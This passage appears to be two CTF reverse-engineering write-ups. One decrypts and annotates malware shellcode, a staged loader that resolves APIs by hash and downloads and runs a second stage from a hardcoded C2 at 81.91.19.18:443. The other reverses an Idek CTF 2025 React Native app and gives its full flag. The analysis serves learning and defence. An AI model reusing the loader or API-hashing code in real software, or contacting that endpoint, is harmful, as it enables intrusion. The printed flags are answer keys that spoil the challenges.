seg000:000000000000001B                 xor     qword ptr ds:rva loc_27[rax], rbx
seg000:000000000000001F                 sub     rax, 0FFFFFFFFFFFFFFF8h
seg000:0000000000000025                 loop    loc_1B
seg000:0000000000000027
seg000:0000000000000027 loc_27:                                 ; DATA XREF: seg000:loc_1B↑w
seg000:0000000000000027                 xchg    eax, ebx
seg000:0000000000000028                 cmp     dword ptr [rcx], 53h ; 'S'
seg000:000000000000002B                 repne xor al, 81h
seg000:000000000000002B ; ---------------------------------------------------------------------------
seg000:000000000000002E                 db 0E6h
seg000:000000000000002F ; ---------------------------------------------------------------------------
seg000:000000000000002F                 outsd
seg000:0000000000000030                 retf
seg000:0000000000000030 ; ---------------------------------------------------------------------------
seg000:0000000000000031                 db 0FBh
seg000:0000000000000032                 dw 43E6h, 1F8Ch, 39B7h
seg000:0000000000000038                 dq 0FB4C69467658B83h, 4FB4C6941AE53183h, 1D6D05964800B583h
seg000:0000000000000050                 dq 0C3267C94CB86F79Bh, 0AEA76DF000CBDBF7h, 3D0BAF1D03F6B702h
[...]

The pattern indicated that the shellcode was implementing runtime decryption - a common technique used by malware to evade static analysis. The valid instructions at the beginning were responsible for decrypting the remaining encrypted payload using a hardcoded XOR key.

I identified the XOR key: 0E64DDC02B7BACB6Fh. The decryption process started at offset 0x27 and continued for the remainder of the shellcode.

To extract and decrypt the payload:

from pwn import xor

content = b''
with open("prog.exe_", "rb") as file:
    content = file.read()

# Locate the shellcode start pattern
index = content.find(b'\x48\x31\xc9')  # xor rcx, rcx instruction
key = bytes.fromhex("e64ddc02b7bacb6f")[::-1]  # Reverse byte order for little-endian
payload = content[index: index + 512]

print("payload in hex:")
print(payload.hex())

# Save the raw encrypted payload
with open('payload.bin', 'wb') as file:
    file.write(payload)

# Decrypt the payload starting from offset 0x27
decoded = xor(payload[0x27:], key)

# Save the decrypted shellcode
with open("decoded.bin", "wb") as file:
    file.write(decoded)

The script successfully extracted and decrypted the shellcode, providing us with the actual malicious payload for further analysis. The decrypted shellcode could now be loaded into IDA Pro for comprehensive reverse engineering.

Decrypted Shellcode Analysis

Loading the decrypted payload into IDA Pro revealed a sophisticated piece of shellcode. Let’s see the complete disassembly first, then break it down section by section:

                cld
                and     rsp, 0FFFFFFFFFFFFFFF0h
                call    sub_D6
; ---------------------------------------------------------------------------
                push    r9
                push    r8
                push    rdx
                push    rcx
                push    rsi
                xor     rdx, rdx
                mov     rdx, gs:[rdx+60h]
                mov     rdx, [rdx+18h]
                mov     rdx, [rdx+20h]

loc_21:
                movzx   rcx, word ptr [rdx+4Ah]
                mov     rsi, [rdx+50h]
                xor     r9, r9

loc_2D:
                xor     rax, rax
                lodsb
                cmp     al, 61h
                jl      short loc_37
                sub     al, 20h

loc_37:
                ror     r9d, 0Dh
                add     r9d, eax
                loop    loc_2D
                push    rdx
                mov     rdx, [rdx+20h]
                push    r9
                mov     eax, [rdx+3Ch]
                add     rax, rdx
                cmp     word ptr [rax+18h], 20Bh
                jnz     loc_CB
                mov     eax, [rax+88h]
                test    rax, rax
                jz      short loc_CB
                add     rax, rdx
                mov     r8d, [rax+20h]
                mov     ecx, [rax+18h]
                add     r8, rdx
                push    rax

loc_72:
                jrcxz   loc_CA
                xor     r9, r9
                dec     rcx
                mov     esi, [r8+rcx*4]
                add     rsi, rdx

loc_81:
                xor     rax, rax
                lodsb
                ror     r9d, 0Dh
                add     r9d, eax
                cmp     al, ah
                jnz     short loc_81
                add     r9, [rsp+8]
                cmp     r9d, r10d
                jnz     short loc_72
                pop     rax
                mov     r8d, [rax+24h]
                add     r8, rdx
                mov     cx, [r8+rcx*2]
                mov     r8d, [rax+1Ch]
                add     r8, rdx
                mov     eax, [r8+rcx*4]
                add     rax, rdx
                pop     r8
                pop     r8
                pop     rsi
                pop     rcx
                pop     rdx
                pop     r8
                pop     r9
                pop     r10
                sub     rsp, 20h
                push    r10
                jmp     rax

; ... (continuing with rest of shellcode)

Dynamic API Resolution

The initial section of the shellcode implements a dynamic API resolution mechanism. After the call sub_D6 instruction, which places the return address (0xA) into rbp, the code beginning at offset 0xA performs the following operations:

push    r9
push    r8  
push    rdx
push    rcx
push    rsi
xor     rdx, rdx
mov     rdx, gs:[rdx+60h]    ; Access Process Environment Block (PEB)
mov     rdx, [rdx+18h]       ; Access LoaderData  
mov     rdx, [rdx+20h]       ; Access InMemoryOrderModuleList

This code walks through the Process Environment Block (PEB) to enumerate loaded DLLs, then implements a custom hashing algorithm to resolve API functions by hash rather than by name. More details on this routine in the appendix.

Main Payload Analysis

Now let’s analyze the main payload starting from sub_D6. This function immediately performs pop rbp, storing the return address in rbp - this address points to the dynamic API resolution routine just described (more analysis on this routine later).

The function proceeds with several API calls using the hash-based resolution mechanism. On Windows x64, the calling convention uses rcx, rdx, r8, and r9 as the first four parameters.

First API Call - LoadLibraryA:

mov     r14, '23_2sw'        ; "ws2_32" string (reversed due to little-endian)
push    r14
mov     r14, rsp             ; R14 now points to "ws2_32" string
mov     rcx, r14             ; First parameter: DLL name
mov     r10d, 726774Ch       ; Hash for LoadLibraryA
call    rbp                  ; Call LoadLibraryA("ws2_32")

Second API Call - WSAStartup:

mov     rdx, r13             ; Second parameter: pointer to WSADATA structure
push    101h
pop     rcx                  ; First parameter: Winsock version
mov     r10d, 6B8029h        ; Hash for WSAStartup
call    rbp                  ; Call WSAStartup(0x101, lpWSAData)

Third API Call - socket:

push    rax                  ; Save previous return values
push    rax
xor     r9, r9               ; Fourth parameter: 0 (protocol, let system choose)
xor     r8, r8               ; Third parameter: 0 (protocol)
inc     rax
mov     rdx, rax             ; Second parameter: 1 (SOCK_STREAM)
inc     rax  
mov     rcx, rax             ; First parameter: 2 (AF_INET)
mov     r10d, 0E0DF0FEAh     ; Hash for socket
call    rbp                  ; Call socket(AF_INET, SOCK_STREAM, 0)
mov     rdi, rax             ; Store socket descriptor

Fourth API Call - connect (with retry loop):

push    10h
pop     r8                   ; Third parameter: sizeof(sockaddr_in) = 16
mov     rdx, r12             ; Second parameter: pointer to sockaddr_in structure
mov     rcx, rdi             ; First parameter: socket descriptor
mov     r10d, 6174A599h      ; Hash for connect
call    rbp                  ; Call connect(socket, sockaddr, 16)
test    eax, eax
jz      short loc_15E        ; If successful (return 0), continue
dec     r14                  ; Decrement retry counter (initially 10)
jnz     short loc_13E        ; If retries left, try again

Fifth API Call - recv (receive stage size):

sub     rsp, 10h             ; Allocate 16 bytes on stack for buffer
mov     rdx, rsp             ; Second parameter: buffer pointer
xor     r9, r9               ; Fourth parameter: 0 (no flags)
push    4
pop     r8                   ; Third parameter: 4 bytes to receive
mov     rcx, rdi             ; First parameter: socket descriptor
mov     r10d, 5FC8D902h      ; Hash for recv
call    rbp                  ; Call recv(socket, buffer, 4, 0)

Sixth API Call - VirtualAlloc:

pop     rsi                  ; Get the 4-byte size value received
push    40h
pop     r9                   ; Fourth parameter: PAGE_EXECUTE_READWRITE
push    1000h
pop     r8                   ; Third parameter: MEM_COMMIT
mov     rdx, rsi             ; Second parameter: size (from recv)
xor     rcx, rcx             ; First parameter: NULL (let system choose address)
mov     r10d, 0E553A458h     ; Hash for VirtualAlloc
call    rbp                  ; Call VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)

Seventh API Call - recv (receive shellcode):

xor     r9, r9               ; Fourth parameter: 0 (no flags)
mov     r8, rsi              ; Third parameter: number of bytes to receive
mov     rdx, rbx             ; Second parameter: allocated memory address
mov     rcx, rdi             ; First parameter: socket descriptor
mov     r10d, 5FC8D902h      ; Hash for recv
call    rbp                  ; Call recv(socket, allocated_memory, size, 0)

The shellcode implements a stage-1 loader that:

1. Establishes a network connection to a remote server
2. Receives the size of the next stage payload
3. Allocates executable memory for the payload
4. Downloads and executes the second-stage payload

This is a classic staged payload architecture commonly used in penetration testing tools and malware, where the initial payload is kept minimal to reduce detection, and the main functionality is delivered in subsequent stages.

Challenge Solution

With the shellcode fully analyzed, the final step was to extract the connection target. Examining the hardcoded SOCKADDR_IN structure in the payload:

mov     r12, 515B1312BB010002h  ; SOCKADDR_IN structure bytes

Breaking down this 64-bit value:

• 0002 = AF_INET (address family)
• 01BB = port 443 in network byte order (big-endian)
• 12135B51 = IP address 81.91.19.18 in network byte order

The shellcode attempts to connect to 81.91.19.18:443, which represents the command and control server for this staged payload.

Flag: 81.91.19.18:443

Appendix: Hash-Based API Resolution Analysis

One of the most interesting aspects of this shellcode is its API resolution mechanism. Instead of importing functions directly, it dynamically resolves Windows API functions using a custom hashing algorithm. This technique is commonly employed by malware to evade static analysis.

The API Resolution Routine

Here’s the complete API resolution routine with detailed comments:

; Entry point - save registers and initialize
push    r9
push    r8
push    rdx
push    rcx
push    rsi
xor     rdx, rdx
mov     rdx, gs:[rdx+60h]        ; Access Process Environment Block (PEB)
mov     rdx, [rdx+18h]           ; Access PEB_LDR_DATA.LoaderData
mov     rdx, [rdx+20h]           ; Access InMemoryOrderModuleList.Flink

; Main DLL enumeration loop
loc_21:
movzx   rcx, word ptr [rdx+4Ah]  ; Read BaseDllName.MaximumLength from LDR_DATA_TABLE_ENTRY
mov     rsi, [rdx+50h]           ; Read BaseDllName.Buffer pointer
xor     r9, r9                   ; Initialize hash accumulator

; DLL name hashing loop
loc_2D:
xor     rax, rax                 ; Clear RAX
lodsb                            ; Load next character from DLL name, increment RSI
cmp     al, 61h                  ; Compare with 'a' (0x61)
jl      short loc_37             ; If less than 'a', skip uppercase conversion
sub     al, 20h                  ; Convert lowercase to uppercase (subtract 0x20)

loc_37:
ror     r9d, 0Dh                 ; Rotate hash right by 13 bits
add     r9d, eax                 ; Add character to hash
loop    loc_2D                   ; Continue until RCX (string length) reaches 0

; Process DLL's export table
push    rdx                      ; Save current LDR_DATA_TABLE_ENTRY pointer
mov     rdx, [rdx+20h]           ; Access DllBase from LDR_DATA_TABLE_ENTRY
push    r9                       ; Save DLL name hash
mov     eax, [rdx+3Ch]           ; Read IMAGE_DOS_HEADER.e_lfanew
add     rax, rdx                 ; Calculate NT headers address
cmp     word ptr [rax+18h], 20Bh ; Check IMAGE_OPTIONAL_HEADER64.Magic (0x020B)
jnz     loc_CB                   ; Skip if not 64-bit PE
mov     eax, [rax+88h]           ; Read DataDirectory[0].VirtualAddress (export table RVA)
test    rax, rax
jz      short loc_CB             ; Skip if no export table
add     rax, rdx                 ; Calculate export table virtual address
mov     r8d, [rax+20h]           ; Read IMAGE_EXPORT_DIRECTORY.AddressOfNames
mov     ecx, [rax+18h]           ; Read IMAGE_EXPORT_DIRECTORY.NumberOfNames
add     r8, rdx                  ; Calculate AddressOfNames virtual address
push    rax                      ; Save export directory pointer

; Function name enumeration loop
loc_72:
jrcxz   loc_CA                   ; Exit if no more names to check
xor     r9, r9                   ; Reset hash accumulator
dec     rcx                      ; Decrement name counter (use as index)
mov     esi, [r8+rcx*4]          ; Read function name RVA from AddressOfNames array
add     rsi, rdx                 ; Calculate function name virtual address

; Function name hashing loop
loc_81:
xor     rax, rax                 ; Clear RAX
lodsb                            ; Load next character from function name
ror     r9d, 0Dh                 ; Rotate hash right by 13 bits
add     r9d, eax                 ; Add character to hash
cmp     al, ah                   ; Check if character is NULL (AH is 0)
jnz     short loc_81             ; Continue if not end of string

; Hash comparison and function resolution
add     r9, [rsp+8]              ; Add DLL name hash to function name hash
cmp     r9d, r10d                ; Compare with target hash (passed in R10)
jnz     short loc_72             ; Continue searching if no match

; Function found - resolve address
pop     rax                      ; Restore export directory pointer
mov     r8d, [rax+24h]           ; Read IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
add     r8, rdx                  ; Calculate AddressOfNameOrdinals virtual address
mov     cx, [r8+rcx*2]           ; Read ordinal from AddressOfNameOrdinals array
mov     r8d, [rax+1Ch]           ; Read IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
add     r8, rdx                  ; Calculate AddressOfFunctions virtual address
mov     eax, [r8+rcx*4]          ; Read function RVA using ordinal as index
add     rax, rdx                 ; Calculate final function address

; Cleanup and return
pop     r8                       ; Restore registers
pop     r8
pop     rsi
pop     rcx
pop     rdx
pop     r8
pop     r9
pop     r10                      ; Pop return address
sub     rsp, 20h                 ; Allocate shadow space for function call
push    r10                      ; Restore return address
jmp     rax                      ; Jump to resolved function

; Continue to next DLL if function not found
loc_CA:
pop     rax                      ; Clean up export directory pointer
loc_CB:
pop     r9                       ; Restore DLL name hash
pop     rdx                      ; Restore LDR_DATA_TABLE_ENTRY pointer
mov     rdx, [rdx]               ; Move to next entry (InMemoryOrderLinks.Flink)
jmp     loc_21                   ; Continue with next DLL

How the Algorithm Works

The API resolution routine implements a sophisticated hash-based function lookup that operates in several phases:

Phase 1: DLL Enumeration The routine begins by accessing the Process Environment Block (PEB) through the gs:[0x60] segment register. The PEB contains the PEB_LDR_DATA structure, which maintains linked lists of all loaded modules in the process. The shellcode walks the InMemoryOrderModuleList to enumerate each loaded DLL.

Phase 2: DLL Name Hashing For each DLL, the routine extracts the BaseDllName from the LDR_DATA_TABLE_ENTRY structure. It then applies a custom hashing algorithm:

• Each character is converted to uppercase if it’s lowercase
• The hash is rotated right by 13 bits
• The character value is added to the hash

This produces a unique 32-bit hash for each DLL name (e.g., “KERNEL32.DLL”, “NTDLL.DLL”).

Phase 3: Export Table Processing For each DLL, the routine locates the PE export table by:

• Reading the e_lfanew field from the DOS header to find the NT headers
• Verifying the PE magic number (0x020B for 64-bit)
• Extracting the export directory from the data directories array

Phase 4: Function Name Hashing The routine iterates through all exported function names using the AddressOfNames array. For each function name, it applies the same hashing algorithm used for DLL names.

Phase 5: Combined Hash Matching The final hash is calculated by adding the DLL name hash to the function name hash. This combined hash is compared against the target hash passed in the r10 register.

Phase 6: Function Address Resolution When a match is found, the routine uses the function’s index to:

• Look up the ordinal in the AddressOfNameOrdinals array
• Use the ordinal to index into the AddressOfFunctions array
• Calculate the final virtual address of the function

Pseudocode Implementation

Here’s a C-style pseudocode representation of the algorithm:

PVOID resolve_api_by_hash(DWORD target_hash) {
    // Access PEB and get first loaded module
    PPEB peb = (PPEB)__readgsqword(0x60);
    PLDR_DATA_TABLE_ENTRY module = (PLDR_DATA_TABLE_ENTRY)
        peb->LoaderData->InMemoryOrderModuleList.Flink;
    
    // Iterate through all loaded modules
    while (module) {
        // Calculate DLL name hash
        DWORD dll_hash = 0;
        PWCHAR dll_name = module->BaseDllName.Buffer;
        USHORT name_len = module->BaseDllName.MaximumLength / 2;
        
        for (USHORT i = 0; i < name_len; i++) {
            WCHAR c = dll_name[i];
            if (c >= 'a' && c <= 'z') c -= 0x20;  // Convert to uppercase
            dll_hash = _rotr(dll_hash, 13) + c;
        }
        
        // Access export table
        PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)module->DllBase;
        PIMAGE_NT_HEADERS64 nt_headers = (PIMAGE_NT_HEADERS64)
            ((PBYTE)module->DllBase + dos_header->e_lfanew);
        
        if (nt_headers->OptionalHeader.Magic != 0x020B) continue;
        
        PIMAGE_EXPORT_DIRECTORY export_dir = (PIMAGE_EXPORT_DIRECTORY)
            ((PBYTE)module->DllBase + 
             nt_headers->OptionalHeader.DataDirectory[0].VirtualAddress);
        
        if (!export_dir) continue;
        
        // Iterate through exported functions
        PDWORD name_rvas = (PDWORD)((PBYTE)module->DllBase + export_dir->AddressOfNames);
        PWORD ordinals = (PWORD)((PBYTE)module->DllBase + export_dir->AddressOfNameOrdinals);
        PDWORD func_rvas = (PDWORD)((PBYTE)module->DllBase + export_dir->AddressOfFunctions);
        
        for (DWORD i = 0; i < export_dir->NumberOfNames; i++) {
            // Calculate function name hash
            DWORD func_hash = 0;
            PCHAR func_name = (PCHAR)((PBYTE)module->DllBase + name_rvas[i]);
            
            while (*func_name) {
                func_hash = _rotr(func_hash, 13) + *func_name++;
            }
            
            // Check combined hash
            if ((dll_hash + func_hash) == target_hash) {
                WORD ordinal = ordinals[i];
                return (PVOID)((PBYTE)module->DllBase + func_rvas[ordinal]);
            }
        }
        
        // Move to next module
        module = (PLDR_DATA_TABLE_ENTRY)module->InMemoryOrderLinks.Flink;
    }
    
    return NULL;  // Function not found
}

This hash-based API resolution technique is particularly effective for malware because:

• It avoids static import tables that signature-based detection might flag
• The hash values provide no obvious indication of which functions are being resolved
• It can resolve functions from any loaded DLL, not just those in the import table
• The custom hashing algorithm makes it difficult for analysts to pre-compute hash dictionaries

Conclusion

This challenge stood out as a rewarding reverse engineering exercise. While I managed to extract the flag (the C2 server address 81.91.19.18:443) within an hour during the live competition, the true value of this challenge extended far beyond the initial solve.

What made this challenge particularly compelling was its use of actual malicious code. This provided an authentic experience of analyzing real-world malware techniques.

The challenge kept me engaged for several days after the competition ended, diving deep into every aspect of the shellcode’s functionality, and writing this blog post. This extended analysis helped me approach Windows internals and expand my knowledge.

Useful Resources

During the analysis, I found several resources particularly valuable for understanding the underlying Windows structures and concepts:

• Process Environment Block (PEB) Analysis: Metehan Bulut’s blog post “Understanding the Process Environment Block (PEB) for Malware Analysis” provided an excellent introduction into PEB structure and its role in malware analysis.

• Windows Kernel Structures: The Vergilius Project for accessing detailed definitions of undocumented Windows kernel structures across different OS versions, particularly for understanding the precise layout of LDR_DATA_TABLE_ENTRY and related structures.

Challenge Overview

Challenge Name: Exposition
CTF: Idek CTF 2025
Category: Mobile/React Native

The challenge presented us with a React Native application consisting of a simple physics-based interface. Users could input text that would spawn as colored rectangles in a physics simulation area, where these rectangles could move and collide with each other.

Initial Analysis

Application Interface

The app features a minimal interface with:

• A large physics simulation area (gray background with blue dotted border)
• An input field at the bottom with the instruction “Type text and press enter to create floating blocks!”
• When text is entered, it creates colored rectangular blocks that can move and interact within the simulation area

The application showing three blocks created from inputs “The”, “is”, and “flag”

First Steps - Static Analysis

Since only an APK file was provided, I began with static analysis using JADX to decompile the application.

The first important file I examined was com.exposition.MainApplication:

package com.exposition;
import android.app.Application;
import android.content.Context;
import com.facebook.react.PackageList;
import com.facebook.react.ReactApplication;
import com.facebook.react.ReactHost;
import com.facebook.react.ReactNativeApplicationEntryPoint;
import com.facebook.react.ReactNativeHost;
import com.facebook.react.ReactPackage;
import com.facebook.react.defaults.DefaultReactHost;
import com.facebook.react.defaults.DefaultReactNativeHost;
// ... [truncated for brevity]

public final class MainApplication extends Application implements ReactApplication {
    private final ReactNativeHost reactNativeHost = new DefaultReactNativeHost(this) {
        private final boolean isHermesEnabled;
        private final boolean isNewArchEnabled;
        
        @Override
        public boolean getUseDeveloperSupport() {
            return false;
        }
        
        // ... additional React Native configuration
    };
    
    @Override
    public void onCreate() {
        super.onCreate();
        ReactNativeApplicationEntryPoint.loadReactNative(this);
    }
}

This confirmed that we were dealing with a React Native application, as evidenced by:

• Multiple imports from com.facebook.react packages
• Implementation of ReactApplication interface
• References to React Native components like ReactNativeHost and ReactPackage

Deep Dive - React Native Reverse Engineering

Learning About React Native Architecture

Since I had never reversed a React Native application before, I started researching the architecture and reverse engineering techniques specific to this framework.

I discovered a very helpful blog post: Reverse Engineering and Instrumenting React Native Apps

Locating the JavaScript Bundle

Following the guide, I found that the React Native code was contained in:

resources/assets/index.android.bundle

However, when I tried to examine this file, I encountered an obstacle:

feld@feld-ZenBook:~/Documents/ctf/idek2025/exposition/attachments/app-jadx/resources/assets$ file index.android.bundle 
index.android.bundle: Hermes JavaScript bytecode, version 96

The file wasn’t plain JavaScript as I expected, but rather Hermes JavaScript bytecode - a specific bytecode format used by React Native applications when the Hermes JavaScript engine is enabled (which we had confirmed from the MainApplication code: isHermesEnabled = true).

The Hermes Challenge

This presented a significant challenge because Hermes bytecode is not human-readable like regular JavaScript. The bytecode is a compiled, optimized format that requires special tools to decompile back into readable JavaScript.

Decompiling Hermes Bytecode

More research led me to discover hermes-dec, a decompiler specifically designed for Hermes JavaScript bytecode. This tool can convert the bytecode back into readable JavaScript.

I used the decompiler on the bundle:

hbc-decompiler assets/index.android.bundle output.js

The decompilation was successful, but it produced a massive JavaScript file. React Native bundles typically contain not just the application code, but also the entire React Native framework, third-party libraries, and all dependencies bundled together into a single file.

Analyzing the Decompiled Output

With the decompiled JavaScript in hand, I now faced the challenge of finding the relevant application code within thousands of lines of framework and library code.

The decompiled file was massive - over 200,000 lines of heavily obfuscated JavaScript.

Finding the Application Logic

To locate the relevant code, I used a simple but effective technique: searching for strings visible in the UI.

I searched for the text "Type something and press enter" which was visible in the app interface, and this led me to find the core application logic.

Here’s the relevant section I discovered:

r17 = _closure1_slot5;
r18 = r17.TextInput;
r17 = {};
r24 = _closure1_slot10;
r24 = r24.inputBox;
r17['style'] = r24;
r24 = 'Type something and press enter...';
r17['placeholder'] = r24;
r17['value'] = r23;
r17['onChangeText'] = r22;
[...]

The next ~1000 lines contain the main application code.

The Flag Validation Logic

More importantly, I found what appeared to be flag validation code. The decompiled JavaScript contained several key elements:

1. Flag Format Validation: The code checks for the standard CTF flag format:
   • Must start with 'idek{'
   • Must end with '}'
   • The content between must match a specific pattern: /^[a-zA-Z0-9_]{61}$/
2. Flag Structure: The validation revealed the flag structure:
   • Total length: 61 characters (excluding the idek{ and } wrapper)
   • Position 16 must be '_'
   • Position 33 must be '_'
   • This creates a three-part structure: PART1_PART2_PART3
   • Part 1: 16 characters (positions 0-15)
   • Part 2: 16 characters (positions 17-32)
   • Part 3: 27 characters (positions 34-60)
3. Three Validation Functions: The code contained three separate validation methods, one for each part of the flag:
   • 1: Validates the first 16 characters
   • 2: Validates the middle 16 characters
   • 3: Validates the final 27 characters
4. Trigger Condition: There’s special logic that activates when the last three text blocks created spell out ['The', 'flag', 'is'] in that exact order

Reverse Engineering the Flag Parts

Now came the challenging part: understanding how each of the three validation functions worked and what they expected as input.

Part 1: The Date-Hash-XOR Challenge

The first part of the flag (16 characters) used a particularly interesting validation approach:

r10 = r10.toString;
r1 = 10;
r10 = r10.bind(r6)(r1);
r6 = r10.padStart;
r5 = 2;
r1 = '0';
r10 = r6.bind(r10)(r5, r1);
// ... more date manipulation ...
r11 = r2.Date;
r1 = '2025-';
r12 = r1 + r10;
r1 = '-';
r1 = r12 + r1;
r19 = r1 + r10;
// Creates date string like "2025-00-00"
r10 = r11.prototype;
r10 = Object.create(r10, {constructor: {value: r11}});
r20 = r10;
r1 = new r20[r11](r19, r18);
r10 = r1 instanceof Object ? r1 : r10;
r1 = r10.toISOString;
r1 = r1.bind(r10)();
r10 = r6.bind(r9)(r1);

The validation works as follows:

1. Date Object Creation: A JavaScript Date object is created with the string "2025-00-00" - which is technically invalid but JavaScript handles it gracefully
2. Date Normalization: The invalid date gets normalized to "2024-11-30T00:00:00.000Z" when toISOString() is called (JavaScript date handling can be quite quirky)
3. SHA-256 Hashing: This normalized date string gets hashed with SHA-256
4. XOR Validation: The first part of the input flag is XORed against a hardcoded key
5. Comparison: If the XOR result matches the SHA-256 hash, the first part passes validation

The relevant XOR validation code:

r1 = [207, 143, 244, 109, 98, 219, 179, 20, 93, 64, 118, 3, 154, 106, 77, 248, 135, 143, 226, 26, 102, 102, 88, 231, 123, 239, 122, 77, 46, 235, 13, 227];
// ... XOR operations with this hardcoded key
r6 = r8.charCodeAt;
r6 = r6.bind(r8)(r2);
r4 = _closure6_slot1;
r4 = r4[r7];
r4 = r6 ^ r4;
r1 = r5 === r4;

Inverting Part 1 Validation

This validation was straightforward to reverse since it’s a simple XOR operation. I wrote a Python script to invert the process:

import hashlib
from pwn import xor

key = [207, 143, 244, 109, 98, 219, 179, 20, 93, 64, 118, 3, 154, 106, 77, 248, 135, 143, 226, 26, 102, 102, 88, 231, 123, 239, 122, 77, 46, 235, 13, 227]
xor_key = bytes(key)
print("xor_key", xor_key)

date_iso = "2024-11-30T00:00:00.000Z"
sha256_hash = hashlib.sha256(date_iso.encode()).digest()
date_iso_hashs = sha256_hash
print("-----")

xored = xor(date_iso_hashs, xor_key)
print(f"xored\t {xored}")

part = ''
for i in range(0, len(xored), 2):
    part += chr(xored[i])
print(part)
print(part[::-1])

This gave me the first 16 characters of the flag.

Part 2: The Lights Out Game Challenge

The second part of the flag validation was much more creative - it implemented a Lights Out puzzle game!

The relevant JavaScript code initialized two 8×8 grids:

r3 = new Array(33);
r1 = [2, 2];
r3[0] = r1;
r1 = [4, 0];
r3[1] = r1;
r1 = [2, 5];
r3[2] = r1;
// ... more grid initialization coordinates ...

r14 = new Array(36);
r1 = [7, 4];
r14[0] = r1;
r1 = [2, 6];
r14[1] = r1;
// ... second grid coordinates ...

The validation works as follows:

1. Grid Setup: Two 8×8 grids are initialized with specific positions set to 1, others to 0
2. Lights Out Rules: Each “move” flips a cell and its orthogonal neighbors (up, down, left, right)
3. Goal: Find the sequence of moves that makes all cells in the grid equal to 0
4. Flag Encoding: The solution pattern encodes the flag characters - each row of moves represents one byte/character

Solving the Lights Out Puzzle

This is essentially a linear algebra problem over GF(2) (binary field). I used Gaussian elimination to solve it:

import numpy as np

def index(r, c):
    return r * 8 + c

def neighbors(r, c):
    for dr, dc in [(0,0), (-1,0), (1,0), (0,-1), (0,1)]:
        nr, nc = r + dr, c + dc
        if 0 <= nr < 8 and 0 <= nc < 8:
            yield index(nr, nc)

# Build the effect matrix A
A = np.zeros((64, 64), dtype=np.uint8)
for r in range(8):
    for c in range(8):
        i = index(r, c)
        for j in neighbors(r, c):
            A[j, i] = 1  # column i = effect of clicking position i

# Initial state (first grid)
grid = [
    [1,0,0,1,1,0,1,0],
    [1,0,0,1,0,1,1,1],
    [1,1,1,0,0,1,0,0],
    [1,1,0,0,1,0,1,0],
    [1,0,0,0,0,0,0,1],
    [1,0,1,1,1,1,1,1],
    [1,0,1,0,1,0,0,1],
    [1,0,1,0,0,0,0,1]
]

b = np.array([bit for row in grid for bit in row], dtype=np.uint8)

# Gaussian elimination mod 2
def gauss_mod2(A, b):
    A = A.copy()
    b = b.copy()
    n = len(b)
    
    for col in range(n):
        pivot = None
        for row in range(col, n):
            if A[row, col]:
                pivot = row
                break
        
        if pivot is None:
            continue  # null column
            
        if pivot != col:
            A[[col, pivot]] = A[[pivot, col]]
            b[[col, pivot]] = b[[pivot, col]]
        
        for row in range(n):
            if row != col and A[row, col]:
                A[row] ^= A[col]
                b[row] ^= b[col]
    
    return b

solution = gauss_mod2(A, b)

# Convert solution to characters
for r in range(8):
    number = int(''.join(str(solution[index(r, c)]) for c in range(8)), 2)
    print(chr(number), end='')

By changing the initial grid matrix, this same script could solve for the second set of 8 characters in Part 2.

Part 3: RC4 Cryptography with Physics Parameters

The final part of the flag (27 characters) used RC4 encryption - the encryption key was derived from the physics simulation parameters used by the app!

Looking at the JavaScript code, I found the relevant section:

r7 = _closure2_slot8;
r7 = r7.current;
r19 = r7.gravity;
r7 = _closure2_slot8;
r7 = r7.current;
r18 = r7.airResistance;
r7 = _closure2_slot8;
r7 = r7.current;
r17 = r7.bounceDamping;
r7 = _closure2_slot8;
r7 = r7.current;
r16 = r7.collisionDamping;
r6 = _closure2_slot8;
r6 = r6.current;
r15 = r6.zeroClampThreshold;
r6 = r2.HermesInternal;
r7 = r6.concat;
r20 = '';
r10 = r20[r7](r19, r18, r17, r16, r15, r14);

And the ciphertext comparison:

r3 = function(a0, a1) { // Environment: r3
    r1 = [134, 145, 231, 193, 40, 196, 78, 177, 206, 34, 168, 148, 66, 43, 66, 136, 194, 158, 195, 255, 243, 123, 190, 218, 173, 28, 3];
    r0 = a1;
    r1 = r1[r0];
    r0 = a0;
    r0 = r0 === r1;
    return r0;
};

The validation works by:

1. Key Generation: Concatenating physics parameters: gravity + airResistance + bounceDamping + collisionDamping + zeroClampThreshold
2. RC4 Encryption: Using the concatenated string as the RC4 key
3. Comparison: The input flag part is encrypted and compared against the hardcoded ciphertext array

Solving the RC4 Challenge

I implemented an RC4 decryption function and used the physics parameters as the key:

def rc4_decrypt(ciphertext, key):
    """
    Standard RC4 implementation for decryption
    """
    # Key Scheduling Algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    
    # Pseudo-Random Generation Algorithm (PRGA)
    i = j = 0
    plaintext = []
    for byte in ciphertext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        keystream_byte = S[(S[i] + S[j]) % 256]
        plaintext_byte = byte ^ keystream_byte
        plaintext.append(plaintext_byte)
    
    return bytes(plaintext)

# Physics parameters from the app
gravity = 0.15
airResistance = 0.996
bounceDamping = 0.7
collisionDamping = 0.8
zeroClampThreshold = 0.005

# Build key by concatenating parameters (as done by HermesInternal.concat)
key_string = f"{gravity}{airResistance}{bounceDamping}{collisionDamping}{zeroClampThreshold}"
print(f"Key string: {key_string}")

# Encode key (as done by TextEncoder in JavaScript)
key_bytes = key_string.encode('utf-8')
print(f"Key bytes: {key_bytes}")

# Hardcoded ciphertext from JavaScript
ciphertext = [134, 145, 231, 193, 40, 196, 78, 177, 206, 34, 168, 148, 66, 43, 66, 136, 194, 158, 195, 255, 243, 123, 190, 218, 173, 28, 3]

# Decrypt
try:
    decrypted = rc4_decrypt(ciphertext, key_bytes)
    print(f"Decrypted as string: {decrypted.decode('utf-8', errors='ignore')}")
except Exception as e:
    print(f"Error during decryption: {e}")

This approach successfully revealed the final 27 characters of the flag by reversing the RC4 encryption using the physics parameters as the decryption key.

Solution

Combining all three parts, the complete flag was:

idek{d3spit3_th3_nam3_No_Expo_was_Used_in_the_cr34t10n_of_7hi5_4pp}

The flag itself is a clever reference to the challenge name “Exposition” - despite the name, no actual Expo (React Native development framework) was used in creating the app!

Lessons Learned

This challenge was an excellent introduction to React Native reverse engineering and taught several valuable techniques:

Technical Skills Gained

Hermes Bytecode Analysis: Learning to identify and decompile Hermes JavaScript bytecode using tools like hermes-dec

JavaScript Quirks

